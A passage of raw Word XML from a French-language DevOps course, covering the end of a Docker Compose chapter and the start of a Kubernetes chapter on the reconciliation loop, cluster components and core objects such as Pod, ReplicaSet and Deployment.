      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un fichier de production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C'est plus lent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Cela déploie une construction locale non testée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Cela casse le réseau</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C'est obsolète</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Comment vérifier la configuration résolue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docker compose ps</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docker compose config</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docker compose logs</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docker compose top</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Sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, seul l'ordre de démarrage est respecté.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> supprime les volumes déclarés.</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Compose combine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>compose.yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>compose.override.yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par défaut.</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La production doit utiliser l'artefact exact qui a été testé.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiche la configuration effective, variables comprises.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>66. Kubernetes : modèle et objets fondamentaux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Comprendre la boucle de contrôle qui maintient un état désiré, avant d'apprendre des commandes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 65</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Décrire l'architecture d'un cluster.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Écrire un manifeste déclaratif.</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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Pod</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ReplicaSet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Deployment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à bon escient.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Lire un état de pod (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CrashLoopBackOff</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Diagnostiquer un déploiement qui ne progresse pas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>66.1 Un état désiré, pas des commandes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes ne reçoit pas d'ordres de démarrage : il reçoit une description de l'état souhaité. Des contrôleurs comparent en boucle l'état réel à cet état et agissent pour réduire l'écart.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="77" name="Picture 77"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f75.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.75 — La boucle de réconciliation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.238 — Sept composants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81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Composant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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253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Où</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>kube-apiserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Point d'entrée de l'API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Control plane</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>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etcd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Stockage de l'état</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Control plane</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>kube-scheduler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Placement des pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Control plane</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>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controller-manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Boucles de contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Control plane</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>kubelet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exécution sur le nœud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chaque nœud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>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kube-proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Réseau des services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Chaque nœud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conteneurs (containerd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chaque nœud</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RÉCONCILIATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Processus continu qui compare l'état observé à l'état désiré et corrige l'écart. C'est ce qui rend Kubernetes auto-réparateur : un pod supprimé est recréé.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>66.2 Le vocabulaire minimal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Quatre objets suffisent pour démarrer. Chacun a une responsabilité précise, et les confondre conduit à des manifestes inutilement compliqués.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.239 — Six objets essentiels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05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Objet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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208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Durée de vie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3883"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un ou plusieurs conteneurs colocalisés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Éphémère</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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ReplicaSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Maintient N copies d'un pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3883"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gère les versions et les montées progressives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Adresse stable devant des pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ConfigMap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
